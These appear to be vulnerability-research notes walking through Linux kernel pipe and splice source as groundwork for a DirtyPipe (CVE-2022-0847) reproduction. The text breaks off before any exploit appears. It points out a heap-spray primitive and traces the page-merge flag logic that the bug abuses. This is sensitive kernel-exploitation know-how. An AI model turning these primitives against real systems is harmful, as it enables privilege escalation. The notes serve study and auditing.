Kernel Audit Notes: pipe.c, splice.c && CVE-2022-0847 DirtyPipe Analysis

Just some notes from reading the source code, plus a reproduction of DirtyPipe that I had been putting off for a while.

Source Code Analysis

const struct file_operations pipefifo_fops = {
.open = fifo_open,
.llseek = no_llseek,
.read_iter = pipe_read,
.write_iter = pipe_write,
.poll = pipe_poll,
.unlocked_ioctl = pipe_ioctl,
.release = pipe_release,
.fasync = pipe_fasync,
.splice_write = iter_file_splice_write,
};

Creating a pipe (pipe, pipe2)

Both the pipe and pipe2 system calls are handled by do_pipe2. It calls __do_pipe_flags to create the pipe, then copies the two file descriptors out to user space; if that succeeds, fd_install is called to make the descriptors take effect.


///home/znl/SkyAsk/Binarysafe/Kernel/linux-5.11.1/fs/pipe.c

/*
* sys_pipe() is the normal C calling standard for creating
* a pipe. It's not the way Unix traditionally does this, though.
*/
static int do_pipe2(int __user *fildes, int flags)
{
struct file *files[2];
int fd[2];
int error;

error = __do_pipe_flags(fd, files, flags);
if (!error) {
if (unlikely(copy_to_user(fildes, fd, sizeof(fd)))) {
fput(files[0]);
fput(files[1]);
put_unused_fd(fd[0]);
put_unused_fd(fd[1]);
error = -EFAULT;
} else {
fd_install(fd[0], files[0]);
fd_install(fd[1], files[1]);
}
}
return error;
}

SYSCALL_DEFINE2(pipe2, int __user *, fildes, int, flags)
{
return do_pipe2(fildes, flags);
}

SYSCALL_DEFINE1(pipe, int __user *, fildes)
{
return do_pipe2(fildes, 0);
}
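
For reference, a minimal user-space call that lands in do_pipe2 might look like this (a sketch, error handling mostly omitted; O_CLOEXEC and O_NONBLOCK are among the flags that __do_pipe_flags accepts):

#define _GNU_SOURCE
#include <fcntl.h>      /* O_CLOEXEC, O_NONBLOCK */
#include <stdio.h>
#include <unistd.h>     /* pipe2 */

int main(void)
{
    int fds[2];

    /* pipe2(2) -> do_pipe2(fildes, flags); plain pipe(2) is do_pipe2(fildes, 0) */
    if (pipe2(fds, O_CLOEXEC | O_NONBLOCK) < 0) {
        perror("pipe2");
        return 1;
    }

    write(fds[1], "hi", 2);        /* fds[1] is the write end (fdw) */
    char c[2];
    read(fds[0], c, sizeof(c));    /* fds[0] is the read end (fdr) */
    return 0;
}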

fd_install associates the entry for fd in the current task's file descriptor table with the given file.
It first gets the open-files structure (files_struct) from the task's task_struct, then gets the fd table (fdtable) from that.

/*
* Install a file pointer in the fd array.
*
* The VFS is full of places where we drop the files lock between
* setting the open_fds bitmap and installing the file in the file
* array. At any such point, we are vulnerable to a dup2() race
* installing a file in the array before us. We need to detect this and
* fput() the struct file we are about to overwrite in this case.
*
* It should never happen - if we allow dup2() do it, _really_ bad things
* will follow.
*
* This consumes the "file" refcount, so callers should treat it
* as if they had called fput(file).
*/

void fd_install(unsigned int fd, struct file *file)
{
struct files_struct *files = current->files;
struct fdtable *fdt;

rcu_read_lock_sched();

if (unlikely(files->resize_in_progress)) {
rcu_read_unlock_sched();
spin_lock(&files->file_lock);
fdt = files_fdtable(files);
BUG_ON(fdt->fd[fd] != NULL);
rcu_assign_pointer(fdt->fd[fd], file);
spin_unlock(&files->file_lock);
return;
}
/* coupled with smp_wmb() in expand_fdtable() */
smp_rmb();
fdt = rcu_dereference_sched(files->fdt);
BUG_ON(fdt->fd[fd] != NULL);
rcu_assign_pointer(fdt->fd[fd], file);
rcu_read_unlock_sched();
}

EXPORT_SYMBOL(fd_install);

The __do_pipe_flags function:

  • Checks that the flags are valid.
  • create_pipe_files creates the pipe files.
  • Grabs two unused file descriptors.
    static int __do_pipe_flags(int *fd, struct file **files, int flags)
    {
    int error;
    int fdw, fdr;

    if (flags & ~(O_CLOEXEC | O_NONBLOCK | O_DIRECT | O_NOTIFICATION_PIPE))
    return -EINVAL;

    error = create_pipe_files(files, flags);
    if (error)
    return error;

    error = get_unused_fd_flags(flags);
    if (error < 0)
    goto err_read_pipe;
    fdr = error;

    error = get_unused_fd_flags(flags);
    if (error < 0)
    goto err_fdr;
    fdw = error;

    audit_fd_pair(fdr, fdw);
    fd[0] = fdr;
    fd[1] = fdw;
    return 0;

    err_fdr:
    put_unused_fd(fdr);
    err_read_pipe:
    fput(files[0]);
    fput(files[1]);
    return error;
    }

The create_pipe_files function

  • get_pipe_inode allocates the inode and the pipe proper (a pipe_inode_info), initializes them, and links the two together.
  • alloc_file_pseudo allocates a pseudo file and associates it with the pipe's inode.
  • That pseudo file is then cloned to serve as the other end of the pipe.
  • stream_open marks the files as stream files (not seekable and with no notion of position).
    /**
    * struct pipe_inode_info - a linux kernel pipe
    * @mutex: mutex protecting the whole thing
    * @rd_wait: reader wait point in case of empty pipe
    * @wr_wait: writer wait point in case of full pipe
    * @head: The point of buffer production
    * @tail: The point of buffer consumption
    * @note_loss: The next read() should insert a data-lost message
    * @max_usage: The maximum number of slots that may be used in the ring
    * @ring_size: total number of buffers (should be a power of 2)
    * @nr_accounted: The amount this pipe accounts for in user->pipe_bufs
    * @tmp_page: cached released page
    * @readers: number of current readers of this pipe
    * @writers: number of current writers of this pipe
    * @files: number of struct file referring this pipe (protected by ->i_lock)
    * @r_counter: reader counter
    * @w_counter: writer counter
    * @fasync_readers: reader side fasync
    * @fasync_writers: writer side fasync
    * @bufs: the circular array of pipe buffers
    * @user: the user who created this pipe
    * @watch_queue: If this pipe is a watch_queue, this is the stuff for that
    **/
    struct pipe_inode_info {
    struct mutex mutex;
    wait_queue_head_t rd_wait, wr_wait;
    unsigned int head;
    unsigned int tail;
    unsigned int max_usage;
    unsigned int ring_size;
    #ifdef CONFIG_WATCH_QUEUE
    bool note_loss;
    #endif
    unsigned int nr_accounted;
    unsigned int readers;
    unsigned int writers;
    unsigned int files;
    unsigned int r_counter;
    unsigned int w_counter;
    struct page *tmp_page;
    struct fasync_struct *fasync_readers;
    struct fasync_struct *fasync_writers;
    struct pipe_buffer *bufs;
    struct user_struct *user;
    #ifdef CONFIG_WATCH_QUEUE
    struct watch_queue *watch_queue;
    #endif
    };

    int create_pipe_files(struct file **res, int flags)
    {
    struct inode *inode = get_pipe_inode();
    struct file *f;
    int error;

    if (!inode)
    return -ENFILE;

    if (flags & O_NOTIFICATION_PIPE) {
    error = watch_queue_init(inode->i_pipe);
    if (error) {
    free_pipe_info(inode->i_pipe);
    iput(inode);
    return error;
    }
    }

    f = alloc_file_pseudo(inode, pipe_mnt, "",
    O_WRONLY | (flags & (O_NONBLOCK | O_DIRECT)),
    &pipefifo_fops);
    if (IS_ERR(f)) {
    free_pipe_info(inode->i_pipe);
    iput(inode);
    return PTR_ERR(f);
    }

    f->private_data = inode->i_pipe;

    res[0] = alloc_file_clone(f, O_RDONLY | (flags & O_NONBLOCK),
    &pipefifo_fops);
    if (IS_ERR(res[0])) {
    put_pipe_info(inode, inode->i_pipe);
    fput(f);
    return PTR_ERR(res[0]);
    }
    res[0]->private_data = inode->i_pipe;
    res[1] = f;
    stream_open(inode, res[0]);
    stream_open(inode, res[1]);
    return 0;
    }

/*
* stream_open is used by subsystems that want stream-like file descriptors.
* Such file descriptors are not seekable and don't have notion of position
* (file.f_pos is always 0 and ppos passed to .read()/.write() is always NULL).
* Contrary to file descriptors of other regular files, .read() and .write()
* can run simultaneously.
*
* stream_open never fails and is marked to return int so that it could be
* directly used as file_operations.open .
*/
int stream_open(struct inode *inode, struct file *filp)
{
filp->f_mode &= ~(FMODE_LSEEK | FMODE_PREAD | FMODE_PWRITE | FMODE_ATOMIC_POS);
filp->f_mode |= FMODE_STREAM;
return 0;
}

EXPORT_SYMBOL(stream_open);

The get_pipe_inode function:

  • new_inode_pseudo allocates a pseudo inode.
  • alloc_pipe_info creates the pipe proper, the pipe_inode_info.
    static struct inode * get_pipe_inode(void)
    {
    struct inode *inode = new_inode_pseudo(pipe_mnt->mnt_sb);
    struct pipe_inode_info *pipe;

    if (!inode)
    goto fail_inode;

    inode->i_ino = get_next_ino();

    pipe = alloc_pipe_info();
    if (!pipe)
    goto fail_iput;

    inode->i_pipe = pipe;
    pipe->files = 2;
    pipe->readers = pipe->writers = 1;
    inode->i_fop = &pipefifo_fops;

    /*
    * Mark the inode dirty from the very beginning,
    * that way it will never be moved to the dirty
    * list because "mark_inode_dirty()" will think
    * that it already _is_ on the dirty list.
    */
    inode->i_state = I_DIRTY;
    inode->i_mode = S_IFIFO | S_IRUSR | S_IWUSR;
    inode->i_uid = current_fsuid();
    inode->i_gid = current_fsgid();
    inode->i_atime = inode->i_mtime = inode->i_ctime = current_time(inode);

    return inode;

    fail_iput:
    iput(inode);

    fail_inode:
    return NULL;
    }

The alloc_pipe_info function:

  • kzalloc allocates the pipe_inode_info.
  • kcalloc allocates the pipe_buffer array (analyzed in more detail below).
    struct pipe_inode_info *alloc_pipe_info(void)
    {
    struct pipe_inode_info *pipe;
    unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
    struct user_struct *user = get_current_user();
    unsigned long user_bufs;
    unsigned int max_size = READ_ONCE(pipe_max_size);

    pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
    if (pipe == NULL)
    goto out_free_uid;

    if (pipe_bufs * PAGE_SIZE > max_size && !capable(CAP_SYS_RESOURCE))
    pipe_bufs = max_size >> PAGE_SHIFT;

    user_bufs = account_pipe_buffers(user, 0, pipe_bufs);

    if (too_many_pipe_buffers_soft(user_bufs) && pipe_is_unprivileged_user()) {
    user_bufs = account_pipe_buffers(user, pipe_bufs, 1);
    pipe_bufs = 1;
    }

    if (too_many_pipe_buffers_hard(user_bufs) && pipe_is_unprivileged_user())
    goto out_revert_acct;

    pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
    GFP_KERNEL_ACCOUNT);

    if (pipe->bufs) {
    init_waitqueue_head(&pipe->rd_wait);
    init_waitqueue_head(&pipe->wr_wait);
    pipe->r_counter = pipe->w_counter = 1;
    pipe->max_usage = pipe_bufs;
    pipe->ring_size = pipe_bufs;
    pipe->nr_accounted = pipe_bufs;
    pipe->user = user;
    mutex_init(&pipe->mutex);
    return pipe;
    }

    out_revert_acct:
    (void) account_pipe_buffers(user, pipe_bufs, 0);
    kfree(pipe);
    out_free_uid:
    free_uid(user);
    return NULL;
    }

The pipe_buffers are allocated in one go: PIPE_DEF_BUFFERS (16) of them.

/**
* struct pipe_buffer - a linux kernel pipe buffer
* @page: the page containing the data for the pipe buffer
* @offset: offset of data inside the @page
* @len: length of data inside the @page
* @ops: operations associated with this buffer. See @pipe_buf_operations.
* @flags: pipe buffer flags. See above.
* @private: private data owned by the ops.
**/
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

However, the total size of the pipe ring (that is, the number of pipe_buffers) can be changed through the call chain below, which allocates a new array and copies the old entries over. A handy heap-spray primitive.

pipe_fcntl
->pipe_set_size
->pipe_resize_ring
/*
* Resize the pipe ring to a number of slots.
*/
int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots)
{
struct pipe_buffer *bufs;
unsigned int head, tail, mask, n;

/*
* We can shrink the pipe, if arg is greater than the ring occupancy.
* Since we don't expect a lot of shrink+grow operations, just free and
* allocate again like we would do for growing. If the pipe currently
* contains more buffers than arg, then return busy.
*/
mask = pipe->ring_size - 1;
head = pipe->head;
tail = pipe->tail;
n = pipe_occupancy(pipe->head, pipe->tail);
if (nr_slots < n)
return -EBUSY;

bufs = kcalloc(nr_slots, sizeof(*bufs),
GFP_KERNEL_ACCOUNT | __GFP_NOWARN);
if (unlikely(!bufs))
return -ENOMEM;

/*
* The pipe array wraps around, so just start the new one at zero
* and adjust the indices.
*/
if (n > 0) {
unsigned int h = head & mask;
unsigned int t = tail & mask;
if (h > t) {
memcpy(bufs, pipe->bufs + t,
n * sizeof(struct pipe_buffer));
} else {
unsigned int tsize = pipe->ring_size - t;
if (h > 0)
memcpy(bufs + tsize, pipe->bufs,
h * sizeof(struct pipe_buffer));
memcpy(bufs, pipe->bufs + t,
tsize * sizeof(struct pipe_buffer));
}
}

head = n;
tail = 0;

kfree(pipe->bufs);
pipe->bufs = bufs;
pipe->ring_size = nr_slots;
if (pipe->max_usage > nr_slots)
pipe->max_usage = nr_slots;
pipe->tail = tail;
pipe->head = head;

/* This might have made more room for writers */
wake_up_interruptible(&pipe->wr_wait);
return 0;
}
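
From user space this path is reached through fcntl(F_SETPIPE_SZ). A minimal sketch (the kernel rounds the request up to a power-of-two number of pages, and unprivileged users are limited by /proc/sys/fs/pipe-max-size):

#define _GNU_SOURCE
#include <fcntl.h>      /* F_SETPIPE_SZ */
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    int fds[2];
    if (pipe(fds) < 0)
        return 1;

    /* fcntl(F_SETPIPE_SZ) -> pipe_fcntl -> pipe_set_size -> pipe_resize_ring */
    int newsz = fcntl(fds[1], F_SETPIPE_SZ, 1024 * 1024);   /* ask for 1 MiB */
    if (newsz < 0) {
        perror("F_SETPIPE_SZ");
        return 1;
    }
    printf("pipe capacity: %d bytes, %ld slots\n",
           newsz, newsz / sysconf(_SC_PAGESIZE));
    return 0;
}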

pipe_write

This function is long, so it is analyzed in pieces.
The user data is carried in an I/O vector (iov_iter):

struct iov_iter {
/*
* Bit 0 is the read/write bit, set if we're writing.
* Bit 1 is the BVEC_FLAG_NO_REF bit, set if type is a bvec and
* the caller isn't expecting to drop a page reference when done.
*/
unsigned int type;
size_t iov_offset;
size_t count;
union {
const struct iovec *iov;
const struct kvec *kvec;
const struct bio_vec *bvec;
struct pipe_inode_info *pipe;
};
union {
unsigned long nr_segs;
struct {
unsigned int head;
unsigned int start_head;
};
};
};
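
On the user side, this iov_iter typically comes straight from the write()/writev() arguments; for example a vectored write into a pipe (a small sketch):

#include <sys/uio.h>    /* writev, struct iovec */
#include <unistd.h>

int main(void)
{
    int fds[2];
    if (pipe(fds) < 0)
        return 1;

    /* both segments arrive in pipe_write() packed into a single iov_iter */
    struct iovec iov[2] = {
        { .iov_base = "hello ", .iov_len = 6 },
        { .iov_base = "pipes\n", .iov_len = 6 },
    };
    writev(fds[1], iov, 2);
    return 0;
}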

If the pipe has no readers (!pipe->readers), it returns -EPIPE immediately.

static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
unsigned int head;
ssize_t ret = 0;
size_t total_len = iov_iter_count(from);
ssize_t chars;
bool was_empty = false;
bool wake_next_writer = false;

/* Null write succeeds. */
if (unlikely(total_len == 0))
return 0;

__pipe_lock(pipe);

if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
ret = -EPIPE;
goto out;
}

#ifdef CONFIG_WATCH_QUEUE
if (pipe->watch_queue) {
ret = -EXDEV;
goto out;
}
#endif


Note that "readers" here is not the number of tasks blocked in read() on the pipe, but a count of how many times the pipe has been opened for reading. For an anonymous pipe both readers and writers are 1; for a named pipe (FIFO) the counters are incremented in fifo_open according to the open mode.

static struct inode * get_pipe_inode(void)
{
...
pipe->readers = pipe->writers = 1;
...
}
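
The !pipe->readers branch is easy to see from user space: close the read end and then write. A small sketch (SIGPIPE is ignored so the EPIPE return value is visible instead of the process being killed):

#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(void)
{
    int fds[2];
    if (pipe(fds) < 0)
        return 1;

    signal(SIGPIPE, SIG_IGN);   /* otherwise the SIGPIPE sent by pipe_write kills us */
    close(fds[0]);              /* drop the last reader: pipe->readers becomes 0 */

    if (write(fds[1], "x", 1) < 0)
        printf("write failed: %s\n", strerror(errno));  /* expected: Broken pipe (EPIPE) */
    return 0;
}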

If the pipe is currently non-empty (head != tail), it first tries to write part of the data into the buffer used last time; note that this requires the buffer to carry the PIPE_BUF_FLAG_CAN_MERGE flag.

   /*
* If it wasn't empty we try to merge new data into
* the last buffer.
*
* That naturally merges small writes, but it also
* page-aligs the rest of the writes for large writes
* spanning multiple pages.
*/
head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
if (chars && !was_empty) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
int offset = buf->offset + buf->len;

if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
ret = pipe_buf_confirm(pipe, buf);
if (ret)
goto out;

ret = copy_page_from_iter(buf->page, offset, chars, from);
if (unlikely(ret < chars)) {
ret = -EFAULT;
goto out;
}

buf->len += ret;
if (!iov_iter_count(from))
goto out;
}
}

Then comes the main write loop.
Each iteration:

  • If !pipe->readers, return -EPIPE.
  • Obtain a page for this write (pipe->tmp_page); it may be freshly allocated, or left over from a previously failed attempt, or one that was just drained.
  • Install it as the current buffer's page and copy the user data into it.
  • If the pipe is full, either return right away (O_NONBLOCK) or wake rd_wait and sleep on wr_wait until some data has been consumed.
    for (;;) {
    if (!pipe->readers) {
    send_sig(SIGPIPE, current, 0);
    if (!ret)
    ret = -EPIPE;
    break;
    }

    head = pipe->head;
    if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
    unsigned int mask = pipe->ring_size - 1;
    struct pipe_buffer *buf = &pipe->bufs[head & mask];
    struct page *page = pipe->tmp_page;
    int copied;

    if (!page) {
    page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
    if (unlikely(!page)) {
    ret = ret ? : -ENOMEM;
    break;
    }
    pipe->tmp_page = page;
    }

    /* Allocate a slot in the ring in advance and attach an
    * empty buffer. If we fault or otherwise fail to use
    * it, either the reader will consume it or it'll still
    * be there for the next write.
    */
    spin_lock_irq(&pipe->rd_wait.lock);

    head = pipe->head;
    if (pipe_full(head, pipe->tail, pipe->max_usage)) {
    spin_unlock_irq(&pipe->rd_wait.lock);
    continue;
    }

    pipe->head = head + 1;
    spin_unlock_irq(&pipe->rd_wait.lock);

    /* Insert it into the buffer array */
    buf = &pipe->bufs[head & mask];
    buf->page = page;
    buf->ops = &anon_pipe_buf_ops;
    buf->offset = 0;
    buf->len = 0;
    if (is_packetized(filp))
    buf->flags = PIPE_BUF_FLAG_PACKET;
    else
    buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
    pipe->tmp_page = NULL;

    copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
    if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
    if (!ret)
    ret = -EFAULT;
    break;
    }
    ret += copied;
    buf->offset = 0;
    buf->len = copied;

    if (!iov_iter_count(from))
    break;
    }

    if (!pipe_full(head, pipe->tail, pipe->max_usage))
    continue;

    /* Wait for buffer space to become available. */
    if (filp->f_flags & O_NONBLOCK) {
    if (!ret)
    ret = -EAGAIN;
    break;
    }
    if (signal_pending(current)) {
    if (!ret)
    ret = -ERESTARTSYS;
    break;
    }

    /*
    * We're going to release the pipe lock and wait for more
    * space. We wake up any readers if necessary, and then
    * after waiting we need to re-check whether the pipe
    * become empty while we dropped the lock.
    */
    __pipe_unlock(pipe);
    if (was_empty) {
    wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
    kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
    }
    wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));
    __pipe_lock(pipe);
    was_empty = pipe_empty(pipe->head, pipe->tail);
    wake_next_writer = true;
    }

pipe_read

Again a big loop. After buf->page has been copied into the I/O vector, if the page has no other references it is either kept as pipe->tmp_page or freed directly.

static ssize_t
pipe_read(struct kiocb *iocb, struct iov_iter *to)
{
size_t total_len = iov_iter_count(to);
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
bool was_full, wake_next_reader = false;
ssize_t ret;

/* Null read succeeds. */
if (unlikely(total_len == 0))
return 0;

ret = 0;
__pipe_lock(pipe);

/*
* We only wake up writers if the pipe was full when we started
* reading in order to avoid unnecessary wakeups.
*
* But when we do wake up writers, we do so using a sync wakeup
* (WF_SYNC), because we want them to get going and generate more
* data for us.
*/
was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);
for (;;) {
unsigned int head = pipe->head;
unsigned int tail = pipe->tail;
unsigned int mask = pipe->ring_size - 1;

#ifdef CONFIG_WATCH_QUEUE
if (pipe->note_loss) {
struct watch_notification n;

if (total_len < 8) {
if (ret == 0)
ret = -ENOBUFS;
break;
}

n.type = WATCH_TYPE_META;
n.subtype = WATCH_META_LOSS_NOTIFICATION;
n.info = watch_sizeof(n);
if (copy_to_iter(&n, sizeof(n), to) != sizeof(n)) {
if (ret == 0)
ret = -EFAULT;
break;
}
ret += sizeof(n);
total_len -= sizeof(n);
pipe->note_loss = false;
}
#endif

if (!pipe_empty(head, tail)) {
struct pipe_buffer *buf = &pipe->bufs[tail & mask];
size_t chars = buf->len;
size_t written;
int error;

if (chars > total_len) {
if (buf->flags & PIPE_BUF_FLAG_WHOLE) {
if (ret == 0)
ret = -ENOBUFS;
break;
}
chars = total_len;
}

error = pipe_buf_confirm(pipe, buf);
if (error) {
if (!ret)
ret = error;
break;
}

written = copy_page_to_iter(buf->page, buf->offset, chars, to);
if (unlikely(written < chars)) {
if (!ret)
ret = -EFAULT;
break;
}
ret += chars;
buf->offset += chars;
buf->len -= chars;

/* Was it a packet buffer? Clean up and exit */
if (buf->flags & PIPE_BUF_FLAG_PACKET) {
total_len = chars;
buf->len = 0;
}

if (!buf->len) {
pipe_buf_release(pipe, buf);
spin_lock_irq(&pipe->rd_wait.lock);
#ifdef CONFIG_WATCH_QUEUE
if (buf->flags & PIPE_BUF_FLAG_LOSS)
pipe->note_loss = true;
#endif
tail++;
pipe->tail = tail;
spin_unlock_irq(&pipe->rd_wait.lock);
}
total_len -= chars;
if (!total_len)
break; /* common path: read succeeded */
if (!pipe_empty(head, tail)) /* More to do? */
continue;
}

if (!pipe->writers)
break;
if (ret)
break;
if (filp->f_flags & O_NONBLOCK) {
ret = -EAGAIN;
break;
}
__pipe_unlock(pipe);

/*
* We only get here if we didn't actually read anything.
*
* However, we could have seen (and removed) a zero-sized
* pipe buffer, and might have made space in the buffers
* that way.
*
* You can't make zero-sized pipe buffers by doing an empty
* write (not even in packet mode), but they can happen if
* the writer gets an EFAULT when trying to fill a buffer
* that already got allocated and inserted in the buffer
* array.
*
* So we still need to wake up any pending writers in the
* _very_ unlikely case that the pipe was full, but we got
* no data.
*/
if (unlikely(was_full)) {
wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT);
}

/*
* But because we didn't read anything, at this point we can
* just return directly with -ERESTARTSYS if we're interrupted,
* since we've done any required wakeups and there's no need
* to mark anything accessed. And we've dropped the lock.
*/
if (wait_event_interruptible_exclusive(pipe->rd_wait, pipe_readable(pipe)) < 0)
return -ERESTARTSYS;

__pipe_lock(pipe);
was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);
wake_next_reader = true;
}

pipe_release

Closing both ends of the pipe is enough to free it.

pipe_release
->put_pipe_info
->free_pipe_info
static int
pipe_release(struct inode *inode, struct file *file)
{
struct pipe_inode_info *pipe = file->private_data;

__pipe_lock(pipe);
if (file->f_mode & FMODE_READ)
pipe->readers--;
if (file->f_mode & FMODE_WRITE)
pipe->writers--;

/* Was that the last reader or writer, but not the other side? */
if (!pipe->readers != !pipe->writers) {
wake_up_interruptible_all(&pipe->rd_wait);
wake_up_interruptible_all(&pipe->wr_wait);
kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT);
}
__pipe_unlock(pipe);

put_pipe_info(inode, pipe);
return 0;
}

static void put_pipe_info(struct inode *inode, struct pipe_inode_info *pipe)
{
int kill = 0;

spin_lock(&inode->i_lock);
if (!--pipe->files) {
inode->i_pipe = NULL;
kill = 1;
}
spin_unlock(&inode->i_lock);

if (kill)
free_pipe_info(pipe);
}


void free_pipe_info(struct pipe_inode_info *pipe)
{
int i;

#ifdef CONFIG_WATCH_QUEUE
if (pipe->watch_queue) {
watch_queue_clear(pipe->watch_queue);
put_watch_queue(pipe->watch_queue);
}
#endif

(void) account_pipe_buffers(pipe->user, pipe->nr_accounted, 0);
free_uid(pipe->user);
for (i = 0; i < pipe->ring_size; i++) {
struct pipe_buffer *buf = pipe->bufs + i;
if (buf->ops)
pipe_buf_release(pipe, buf);
}
if (pipe->tmp_page)
__free_page(pipe->tmp_page);
kfree(pipe->bufs);
kfree(pipe);
}

splice

splice moves data directly between a pipe and a file, avoiding the copy between kernel space and user space.

SYSCALL_DEFINE6(splice, int, fd_in, loff_t __user *, off_in,
int, fd_out, loff_t __user *, off_out,
size_t, len, unsigned int, flags)
{
struct fd in, out;
long error;

if (unlikely(!len))
return 0;

if (unlikely(flags & ~SPLICE_F_ALL))
return -EINVAL;

error = -EBADF;
in = fdget(fd_in);
if (in.file) {
out = fdget(fd_out);
if (out.file) {
error = __do_splice(in.file, off_in, out.file, off_out,
len, flags);
fdput(out);
}
fdput(in);
}
return error;
}

__do_splice fetches and validates the user arguments; no offset may be passed for an end that is a pipe.

static long __do_splice(struct file *in, loff_t __user *off_in,
struct file *out, loff_t __user *off_out,
size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset, *__off_in = NULL, *__off_out = NULL;
long ret;

ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);

if (ipipe && off_in)
return -ESPIPE;
if (opipe && off_out)
return -ESPIPE;

if (off_out) {
if (copy_from_user(&offset, off_out, sizeof(loff_t)))
return -EFAULT;
__off_out = &offset;
}
if (off_in) {
if (copy_from_user(&offset, off_in, sizeof(loff_t)))
return -EFAULT;
__off_in = &offset;
}

ret = do_splice(in, __off_in, out, __off_out, len, flags);
if (ret < 0)
return ret;

if (__off_out && copy_to_user(off_out, __off_out, sizeof(loff_t)))
return -EFAULT;
if (__off_in && copy_to_user(off_in, __off_in, sizeof(loff_t)))
return -EFAULT;

return ret;
}

do_splice dispatches according to the nature of the files at the two ends.

/*
* Determine where to splice to/from.
*/
long do_splice(struct file *in, loff_t *off_in, struct file *out,
loff_t *off_out, size_t len, unsigned int flags);

do_splice
->splice_pipe_to_pipe pipe->pipe
->do_splice_from pipe->file
->do_splice_to file->pipe
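
For example, copying a file to another file through a pipe from user space exercises both directions, do_splice_to for file -> pipe and do_splice_from for pipe -> file (a sketch; every splice call must have a pipe on at least one side):

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* copy a file through a pipe without a user-space buffer */
int main(int argc, char *argv[])
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s <src> <dst>\n", argv[0]);
        return 1;
    }

    int in  = open(argv[1], O_RDONLY);
    int out = open(argv[2], O_WRONLY | O_CREAT | O_TRUNC, 0644);
    int fds[2];
    if (in < 0 || out < 0 || pipe(fds) < 0)
        return 1;

    for (;;) {
        /* file -> pipe: do_splice_to, the page cache page is shared into a pipe_buffer */
        ssize_t n = splice(in, NULL, fds[1], NULL, 65536, 0);
        if (n <= 0)
            break;
        /* pipe -> file: do_splice_from -> iter_file_splice_write */
        while (n > 0) {
            ssize_t m = splice(fds[0], NULL, out, NULL, n, 0);
            if (m <= 0)
                return 1;
            n -= m;
        }
    }
    return 0;
}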

The splice_pipe_to_pipe function
Jump straight to the main loop. There are two cases (a user-space sketch that exercises both follows the code below):

  • The length still to be copied is >= the current ibuf's length: the whole ibuf is handed to obuf and ibuf->ops is set to NULL, much like move semantics. ibuf->page is not cleared here, which intuitively looks like a problem, but looking back at pipe_write, a buffer's page is only ever replaced with pipe->tmp_page before data is copied into it, so obuf is not affected. The only other concern is a merge: to merge into this ibuf it would have to be at head - 1, and since i_tail++ has already happened, tail == (head - 1) + 1 == head, i.e. the pipe must be empty at that point, so no merge can target this buffer either (this may read a bit awkwardly; it is analyzed once more further down).
  • The length still to be copied is < the current ibuf's length: pipe_buf_get is called first to take an extra reference on ibuf->page, so the page is used by both ibuf and obuf, though with different len, offset, and flags. Note that PIPE_BUF_FLAG_CAN_MERGE must be cleared here, because the page still contains readable data on the ibuf side, and a merged write through obuf would overwrite that data.
    static int splice_pipe_to_pipe(struct pipe_inode_info *ipipe,
    struct pipe_inode_info *opipe,
    size_t len, unsigned int flags)
    {
    ......
    do {
    ......
    ibuf = &ipipe->bufs[i_tail & i_mask];
    obuf = &opipe->bufs[o_head & o_mask];

    if (len >= ibuf->len) {
    /*
    * Simply move the whole buffer from ipipe to opipe
    */
    *obuf = *ibuf;
    ibuf->ops = NULL;
    i_tail++;
    ipipe->tail = i_tail;
    input_wakeup = true;
    o_len = obuf->len;
    o_head++;
    opipe->head = o_head;
    } else {
    /*
    * Get a reference to this pipe buffer,
    * so we can copy the contents over.
    */
    if (!pipe_buf_get(ipipe, ibuf)) {
    if (ret == 0)
    ret = -EFAULT;
    break;
    }
    *obuf = *ibuf;

    /*
    * Don't inherit the gift and merge flags, we need to
    * prevent multiple steals of this page.
    */
    obuf->flags &= ~PIPE_BUF_FLAG_GIFT;
    obuf->flags &= ~PIPE_BUF_FLAG_CAN_MERGE;

    obuf->len = len;
    ibuf->offset += len;
    ibuf->len -= len;
    o_len = len;
    o_head++;
    opipe->head = o_head;
    }
    ret += o_len;
    len -= o_len;
    } while (len);
    ......
    }
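
Both branches can be triggered from user space by splicing between two pipes, depending on whether the requested length covers the source buffer (a sketch):

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    int a[2], b[2];
    char buf[32];

    if (pipe(a) < 0 || pipe(b) < 0)
        return 1;

    write(a[1], "hello world", 11);

    /* len (5) < ibuf->len (11): the second branch runs, the page is shared
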